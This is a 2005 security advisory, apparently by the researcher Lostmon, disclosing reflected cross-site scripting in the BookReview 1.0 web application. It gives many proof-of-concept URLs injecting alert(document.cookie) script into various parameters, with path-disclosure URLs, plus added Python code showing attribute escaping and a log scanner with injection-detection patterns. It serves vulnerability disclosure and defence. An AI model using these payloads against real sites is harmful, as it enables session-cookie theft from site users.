BookReview 1.0 multiple variable XSS

Wednesday, May 25, 2005
###################################################
BookReview 1.0 multiple variable XSS
vendor url: http://www.readersunite.com
advisory: http://lostmon.blogspot.com/2005/05/bookreview-10-multiple-variable-xss.html
vendor notify: yes
exploit available: yes
OSVDB ID: 16871, 16872, 16873, 16874, 16875, 16876, 16877, 16878, 16879, 16880, 16881
BID: 13783
Securitytracker: 1014058
###################################################

BookReview contains a flaw that allows a remote cross-site
scripting attack. This flaw exists because the
application does not validate multiple variables upon
submission to multiple scripts. This could allow a user
to create a specially crafted URL that would execute
arbitrary script code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.

############
versions:
############

BookReview beta 1.0 vulnerable.

##############
solution
##############

no solution was available at this time

###########
timeline
###########

discovered: 27 april 2005
vendor notified: 17 may 2005 (webform)
disclosure: 26 may 2005

##################
proof of concepts
###################

all modules are loaded through the 'index.php' script via the 'page' variable, like
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]
the name of the module can be 'add_review', 'add_contents' or others

for example this url:
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25

is the same as this one:

http://[victim]/add_contents.htm?isbn=083081423X&chapters=25

so there are two ways to reach the vulnerable code: one through
index.php and the other directly through the module page.
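As an added illustration (not BookReview's code), a hypothetical stand-in for the add_review form that echoes 'isbn' and 'node' into value="" attributes the way the advisory describes, beside the attribute-encoded version. The check confirms that the page's own payload breaks out of the attribute in the first and stays inert text in the second.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Hypothetical stand-in for the add_review form (added illustration, not
# BookReview's code): 'isbn' and 'node' are echoed back into value="" attributes.
FORM = '<input name="isbn" value="{isbn}"><input name="node" value="{node}">'

# Query string taken from the add_review proof of concept in this advisory.
POC_QUERY = 'isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true'


def _params(query: str) -> dict:
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_unsafe(query: str) -> str:
    """Reflect the parameters verbatim: the behaviour the advisory reports."""
    p = _params(query)
    return FORM.format(isbn=p.get("isbn", ""), node=p.get("node", ""))


def render_safe(query: str) -> str:
    """Same form, but every reflected value is HTML-attribute-encoded.
    quote=True turns '"' into &quot; so a value can never close the attribute."""
    p = _params(query)
    return FORM.format(isbn=html.escape(p.get("isbn", ""), quote=True),
                       node=html.escape(p.get("node", ""), quote=True))


class _Tags(HTMLParser):
    """Collects the start tags a browser-like parser sees in the output."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def script_injected(page: str) -> bool:
    """True if the rendered page contains a real <script> element, i.e. the
    reflected value escaped its attribute instead of staying inert text."""
    t = _Tags()
    t.feed(page)
    t.close()
    return "script" in t.tags


if __name__ == "__main__":
    print("unsafe:", script_injected(render_unsafe(POC_QUERY)))  # True
    print("safe:  ", script_injected(render_safe(POC_QUERY)))    # False
```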

##################
add_review.htm
#################

http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true

http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true

http://[victim]/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true

http://[victim]/add_review.htm?node=index&isbn=\"><script>alert(document.cookie)</script>

###################
index.php
###################

http://[victim]/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25

http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

NICE ERROR !!




###################
add_contents.htm
###################


http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#########################
others.
#########################

http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author

http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels

http://[victim]/suggest_review.htm?node=Business_and_Economics"><script>alert(document.cookie)</script>

############################
possible local file inclusion
############################

http://[victim]/suggestions/"><script>alert(document.cookie)</script> .htm

http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm



################
path disclosure:
################

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=author

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title
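Added detection example for the proof-of-concept requests above (not the author's code): it parses constructed access-log lines, maps index.php?page=X and X.htm to the same module name as the advisory explains, percent-decodes each parameter value (including the extra layer seen in the search.htm payload) and flags values that look like attribute break-out or script injection.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (not from a real server) that replay the kinds of
# requests in the proof-of-concept section: one benign, two carrying payloads.
LOG_LINES = [
    '10.0.0.5 - - [26/May/2005:10:00:01 +0200] "GET /index.php?page=add_contents'
    '&isbn=083081423X&chapters=25 HTTP/1.1" 200 512',
    '10.0.0.7 - - [26/May/2005:10:00:09 +0200] "GET /add_review.htm?isbn=0553278223'
    '&node=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true HTTP/1.1" 200 640',
    '10.0.0.7 - - [26/May/2005:10:00:12 +0200] "GET /search.htm?page=search'
    '&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
    '&submit=Ok&submit%5Btype%5D=author HTTP/1.1" 200 640',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Attribute break-out ("> or '>), script tags, and the usual inline JS sinks.
SUSPICIOUS = re.compile(r'["\']\s*>|<\s*/?\s*script|javascript:|\bon\w+\s*=', re.I)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (%2522 -> %22 -> ")."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def module_of(path: str, params: dict) -> str:
    """index.php?page=X and /X.htm reach the same code, so report one name."""
    if path.endswith("/index.php"):
        return params.get("page", "index")
    name = path.rsplit("/", 1)[-1]
    return name[:-4] if name.endswith(".htm") else name


def scan(lines) -> list:
    """Return (module, parameter) pairs whose decoded value looks like injection."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        params = dict(parse_qsl(url.query, keep_blank_values=True))
        module = module_of(url.path, params)
        for name, value in params.items():
            if SUSPICIOUS.search(decode_fully(value)):
                hits.append((module, name))
    return hits
```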

######################## €nd ########################

thnx to estrella for being my light
Thnx to icaro, he is my Shadow !!!
thnx to all the http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what moves the mind